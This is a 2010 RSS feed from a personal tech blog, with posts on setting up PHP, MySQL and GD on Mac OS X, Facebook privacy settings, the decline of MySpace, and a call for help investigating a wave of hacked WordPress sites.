<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>nDarkness</title>
	<atom:link href="http://blog.ndarkness.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.ndarkness.com</link>
	<description></description>
	<lastBuildDate>Fri, 21 May 2010 02:10:36 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Mac OS X &#8211; Update PHP, MySQL and Easily Add GD Support</title>
		<link>http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/</link>
		<comments>http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/#comments</comments>
		<pubDate>Thu, 20 May 2010 01:34:08 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Utilities]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[MySQL]]></category>
		<category><![CDATA[OS X]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=493</guid>
		<description><![CDATA[If you have ever tried compiling the GD library on Mac OS X, you know that there are several issues to overcome before it is usable. Not to mention the version of PHP included with OS X wasn&#8217;t compiled with this option. In this post I will detail an easy method to update PHP, install [...]]]></description>
			<content:encoded><![CDATA[
<!-- Quick Adsense Wordpress Plugin: http://techmilieu.com/quick-adsense -->
<div style="float:none;margin:0px 0 0px 0;text-align:center;">
<script type="text/javascript"><!--
google_ad_client = "pub-7910203208217531";
/* 468x60 Forum, created 5/20/10 */
google_ad_slot = "6063890470";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<br /><br />
</div>
<p><img src="http://blog.ndarkness.com/wp-content/blogs.dir/1/files/2010/05/term.png" height="175" width="250" style="float: right;padding-left: 10px" />If you have ever tried compiling the GD library on Mac OS X, you know that there are several issues to overcome before it is usable.  Not to mention the version of PHP included with OS X wasn&#8217;t compiled with this option.  In this post I will detail an easy method to update PHP, install MySQL and the GD library in just a few steps.</p>
<p>To start this process, we need to grab a couple of install packages from the links listed below:</p>
<ul>
<li><a href="http://dev.mysql.com/downloads/mysql/" target="_blank">MySQL</a> for your version of OS X.</li>
<li>Marc Liyanage&#8217;s <a href="http://www.entropy.ch/software/macosx/php/" target="_blank">PHP Apache Module</a>.</li>
</ul>
<p>Once you have these packages downloaded, we can start by installing MySQL.  Open the MySQL image and install the package by following the directions.  When the install process finishes, copy the MySQL.prefPane to &#8220;your_user/Library/PreferencePanes&#8221;.  Doing this allows you to start and stop the server from the system preferences window.  Finally, make sure you take the time to <a href="http://www.cert.org.in/training/14Oct09/SecuringMySQL.pdf" target="_blank">secure</a> your new installation.</p>
<p>If you had previously enabled the PHP module in the httpd.conf file, make sure you comment it back out.</p>
<p>Using the terminal from: Applications=&gt;Utilities=&gt;Terminal.app<br />
(The following commands are entered without quotes.)</p>
<ul>
<li>First type: &#8220;vi /etc/apache2/httpd.conf&#8221;</li>
<li>Find the PHP module:<br />
LoadModule php5_module        libexec/apache2/libphp5.so</li>
<li>Type: &#8220;i&#8221; and change the line to read:<br />
#LoadModule php5_module        libexec/apache2/libphp5.so</li>
<li>Now press the &#8220;esc&#8221; key, type &#8220;:wq&#8221; and press &#8220;enter&#8221;</li>
</ul>
<p>The next step in this process is to install an updated version of PHP with GD support.  The great thing about using the Entropy package, is that all of the hard work is already done for you!  Open the installer and click the customize button if you don&#8217;t need all of the included extensions.  </p>
<p><img src="http://blog.ndarkness.com/wp-content/blogs.dir/1/files/2010/05/php-ins.png" height="375" width="500" /></p>
<p>Once you have chosen the extensions you need, click install.  When the install finishes, the last thing we need to do is edit the php.ini.</p>
<p>Using the terminal from: Applications=&gt;Utilities=&gt;Terminal.app<br />
(The following commands are entered without quotes.)</p>
<ul>
<li>First type: &#8220;vi /usr/local/php5/lib/php.ini&#8221;</li>
<li>Now type: &#8220;?mysql&#8221; and scroll up until you get to the lines that look like this:<br />
mysql.default_socket = /tmp/mysql.sock<br />
mysqli.default_socket = /tmp/mysql.sock</li>
<li>Type &#8220;i&#8221; and change them to:<br />
mysql.default_socket = /var/mysql/mysql.sock<br />
mysqli.default_socket = /var/mysql/mysql.sock</li>
<li>Finally press the &#8220;esc&#8221; key, type &#8220;:wq&#8221; and press &#8220;enter&#8221;</li>
</ul>
<p>Now all you have to do is start Web Sharing from the system preferences window and all of your new features will be ready to use.</p>
<small>GHTime Code(s): nc&nbsp;nc&nbsp;087f6&nbsp;</small>
<div style="font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both"></div>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;title=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;title=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;title=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;title=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;title=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support&amp;desc=If%20you%20have%20ever%20tried%20compiling%20the%20GD%20library%20on%20Mac%20OS%20X%2C%20you%20know%20that%20there%20are%20several%20issues%20to%20overcome%20before%20it%20is%20usable.%20%20Not%20to%20mention%20the%20version%20of%20PHP%20included%20with%20OS%20X%20wasn%27t%20compiled%20with%20this%20option.%20%20In%20this%20post%20I%20will%20detail%20an%20easy%20method%20to%20update%20PHP%2C%20install%20MySQL%20and%20the" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;t=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;bm_description=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;title=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;title=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/&amp;t=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Mac+OS+X+-+Update+PHP%2C+MySQL+and+Easily+Add+GD+Support+-+http://tinyurl.com/259h33y&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/493/mac-os-x-update-php-mysql-and-easily-add-gd-support/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Facebook&#8217;s Privacy Troubles on the Horizon</title>
		<link>http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/</link>
		<comments>http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/#comments</comments>
		<pubDate>Tue, 18 May 2010 02:39:40 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Account information]]></category>
		<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[Facebook]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=469</guid>
		<description><![CDATA[Back in February of 2009 there was a big debate over the new terms of agreement that Facebook adopted. Due to the negative feedback over this decision, Facebook&#8217;s executives caved from the pressure and reverted to the old terms. Now a little over a year later, this same group is at it again. If you [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://blog.ndarkness.com/wp-content/blogs.dir/1/files/2010/05/fbook.jpg" height="135" width="150" style="float: left;padding-right: 10px" />Back in February of 2009 there was a big debate over the new terms of agreement that Facebook adopted.  Due to the negative feedback over this decision, Facebook&#8217;s executives caved from the pressure and reverted to the old terms.  Now a little over a year later, this same group is at it again.  </p>
<p>If you have a Facebook account and haven&#8217;t bothered to check your privacy settings lately, you may be surprised to learn just how much any and everyone can find out about you.  Due to recent changes in the company&#8217;s <a href="http://www.facebook.com/policy.php">privacy policy</a>, more of your personal information is now easily accessible in more ways than you can imagine.</p>
<p><img src="http://blog.ndarkness.com/wp-content/blogs.dir/1/files/2010/05/openLock.png" height="150" width="150" style="float: right" />Facebook&#8217;s idea of privacy is that you, the user, have to police what you share.  In other words, it is your responsibility to constantly check your privacy settings to see if any changes have been made and opt out of these changes if you don&#8217;t agree.  I&#8217;m sure that most of you would agree when I say, there are better things to do with your time than to constantly check privacy settings on a website.</p>
<p>Feel free to see for yourself:</p>
<ol>
<li>Once logged in, click on the &#8216;Account&#8217; button and then &#8216;Privacy Settings&#8217;.</li>
<li>Next click on &#8216;Applications and Websites&#8217;, &#8216;What you Share&#8217; and hidden almost at the bottom of the page click &#8216;this page&#8217;.</li>
<li>Make sure you go through each application listed by clicking on &#8216;Edit Settings&#8217; and secure them to your liking.</li>
<li>Now, go back to the &#8216;Applications and Websites&#8217; page and click on &#8216;What your friends can show about you&#8217; to edit the options here as well.</li>
<li>Finally, back on the &#8216;Applications and Websites&#8217; page, click on the &#8216;Instant Personalization Pilot Program&#8217; link and uncheck the box that allows Facebook partners to access your public information when you arrive on their websites.</li>
</ol>
<p>Once you finish, ask yourself, should I really be forced to put up with this?</p>
<small>GHTime Code(s): becb9&nbsp;nc&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;title=Facebook%27s+Privacy+Troubles+on+the+Horizon" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;title=Facebook%27s+Privacy+Troubles+on+the+Horizon" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;title=Facebook%27s+Privacy+Troubles+on+the+Horizon" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;title=Facebook%27s+Privacy+Troubles+on+the+Horizon" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;title=Facebook%27s+Privacy+Troubles+on+the+Horizon&amp;desc=Back%20in%20February%20of%202009%20there%20was%20a%20big%20debate%20over%20the%20new%20terms%20of%20agreement%20that%20Facebook%20adopted.%20%20Due%20to%20the%20negative%20feedback%20over%20this%20decision%2C%20Facebook%27s%20executives%20caved%20from%20the%20pressure%20and%20reverted%20to%20the%20old%20terms.%20%20Now%20a%20little%20over%20a%20year%20later%2C%20this%20same%20group%20is%20at%20it%20again.%20%20%0D%0A%0D%0A" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;t=Facebook%27s+Privacy+Troubles+on+the+Horizon" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;bm_description=Facebook%27s+Privacy+Troubles+on+the+Horizon&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;title=Facebook%27s+Privacy+Troubles+on+the+Horizon" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;title=Facebook%27s+Privacy+Troubles+on+the+Horizon" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/&amp;t=Facebook%27s+Privacy+Troubles+on+the+Horizon" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Facebook%27s+Privacy+Troubles+on+the+Horizon+-+http://tinyurl.com/259k3xy&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/469/facebooks-privacy-troubles-on-the-horizon/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Should MySpace Be Put Out to Pasture?</title>
		<link>http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/</link>
		<comments>http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/#comments</comments>
		<pubDate>Fri, 14 May 2010 02:40:32 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[MySpace]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=456</guid>
		<description><![CDATA[For years I have heard many people talk about how MySpace has been losing popularity and that it will soon be gone. As of today, these predictions have yet to come true. I can&#8217;t help but remember when everyone I knew was talking about this great new site called MySpace. I remember feeling like maybe [...]]]></description>
			<content:encoded><![CDATA[<p><img src="wp-content/blogs.dir/1/files/2010/05/myspace-logo.jpg" style="float: left" />For years I have heard many people talk about how MySpace has been losing popularity and that it will soon be gone.  As of today, these predictions have yet to come true.  </p>
<p>I can&#8217;t help but remember when everyone I knew was talking about this great new site called MySpace.  I remember feeling like maybe I was missing the boat because I hadn&#8217;t bought into the hype of creating my account, customizing the page and reconnecting with all of my friends.  Don&#8217;t get me wrong, I think the social networking phenomenon is a great concept and is obviously widely popular.  Many starting bands have had great success using this medium to get their music out there for the world to hear and we are able to communicate with friends and family all over the world for free.  With that said, I don&#8217;t really regret not buying in to this concept, I just regret not coming up with the idea first.  Let&#8217;s face it, the idea of exploit my members at every turn in order to make myself more money is just genius.</p>
<p>So why is it that MySpace is not as popular as it once was?  Where did they go wrong and can they come back from their downward spiral?  Well, to be honest, I&#8217;m not really sure and personally don&#8217;t even care.  </p>
<p>The idea of putting my personal life out there for the world to see, doesn&#8217;t appeal to me.  Most people will agree that they like their privacy and are often offended when it is violated.  However, these same people will put all of their information, pictures and videos out there for the world to see.  I haven&#8217;t even begun to mentioned the spam and phishing attacks that have plagued these sites since their creation that so many people are fooled by daily.  Does anyone see a problem here?  What better playground for social engineering and identity theft can you ask for?  It&#8217;s like a one stop shop for all your criminal needs.</p>
<p>So what are your thoughts on the future of MySpace and/or social networking?</p>
<small>GHTime Code(s): nc&nbsp;094dd&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;title=Should+MySpace+Be+Put+Out+to+Pasture%3F" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;title=Should+MySpace+Be+Put+Out+to+Pasture%3F" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;title=Should+MySpace+Be+Put+Out+to+Pasture%3F" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;title=Should+MySpace+Be+Put+Out+to+Pasture%3F" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;title=Should+MySpace+Be+Put+Out+to+Pasture%3F&amp;desc=For%20years%20I%20have%20heard%20many%20people%20talk%20about%20how%20MySpace%20has%20been%20losing%20popularity%20and%20that%20it%20will%20soon%20be%20gone.%20%20As%20of%20today%2C%20these%20predictions%20have%20yet%20to%20come%20true.%20%20%0D%0A%0D%0AI%20can%27t%20help%20but%20remember%20when%20everyone%20I%20knew%20was%20talking%20about%20this%20great%20new%20site%20called%20MySpace.%20%20I%20remember%20feeling%20lik" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;t=Should+MySpace+Be+Put+Out+to+Pasture%3F" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;bm_description=Should+MySpace+Be+Put+Out+to+Pasture%3F&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;title=Should+MySpace+Be+Put+Out+to+Pasture%3F" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;title=Should+MySpace+Be+Put+Out+to+Pasture%3F" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/&amp;t=Should+MySpace+Be+Put+Out+to+Pasture%3F" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Should+MySpace+Be+Put+Out+to+Pasture%3F+-+http://tinyurl.com/39s3bn3&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/456/should-myspace-be-put-out-to-pasture/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>WordPress Sites Hacked in Bulk</title>
		<link>http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/</link>
		<comments>http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/#comments</comments>
		<pubDate>Tue, 11 May 2010 01:25:32 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=441</guid>
		<description><![CDATA[By now, I&#8217;m sure we have all heard about the numerous WordPress sites that have been hacked on several of the major hosting providers. From all of the reports so far, no one can seem to figure out what the problem is or how the breaches are happening. Is the problem a server misconfiguration, outdated [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/wp-content/blogs.dir/1/files/2010/05/wordpress-blackhat.png" style="float: left;padding-right: 15px" height="150" width="150" />By now, I&#8217;m sure we have all heard about the numerous WordPress sites that have been hacked on several of the major hosting providers.  From all of the reports so far, no one can seem to figure out what the problem is or how the breaches are happening.  </p>
<p>Is the problem a server misconfiguration, outdated WordPress blog, weak passwords or a serious bug in WordPress itself?  </p>
<p>If your site has been hacked and you have access to the access_logs, post them along with any other relevant information that you have and as a community let&#8217;s go through the information to see if we can find the problem.  </p>
<small>GHTime Code(s): fa962&nbsp;d7fed&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;title=Wordpress+Sites+Hacked+in+Bulk" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;title=Wordpress+Sites+Hacked+in+Bulk" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;title=Wordpress+Sites+Hacked+in+Bulk" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;title=Wordpress+Sites+Hacked+in+Bulk" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;title=Wordpress+Sites+Hacked+in+Bulk&amp;desc=By%20now%2C%20I%27m%20sure%20we%20have%20all%20heard%20about%20the%20numerous%20WordPress%20sites%20that%20have%20been%20hacked%20on%20several%20of%20the%20major%20hosting%20providers.%20%20From%20all%20of%20the%20reports%20so%20far%2C%20no%20one%20can%20seem%20to%20figure%20out%20what%20the%20problem%20is%20or%20how%20the%20breaches%20are%20happening.%20%20%0D%0A%0D%0AIs%20the%20problem%20a%20server%20misconfiguration%2C%20" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;t=Wordpress+Sites+Hacked+in+Bulk" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;bm_description=Wordpress+Sites+Hacked+in+Bulk&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/441/wordpress-sites-hacked-in-bulk/&amp;title=Wordpress+Sites+Hacked+in+Bulk" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
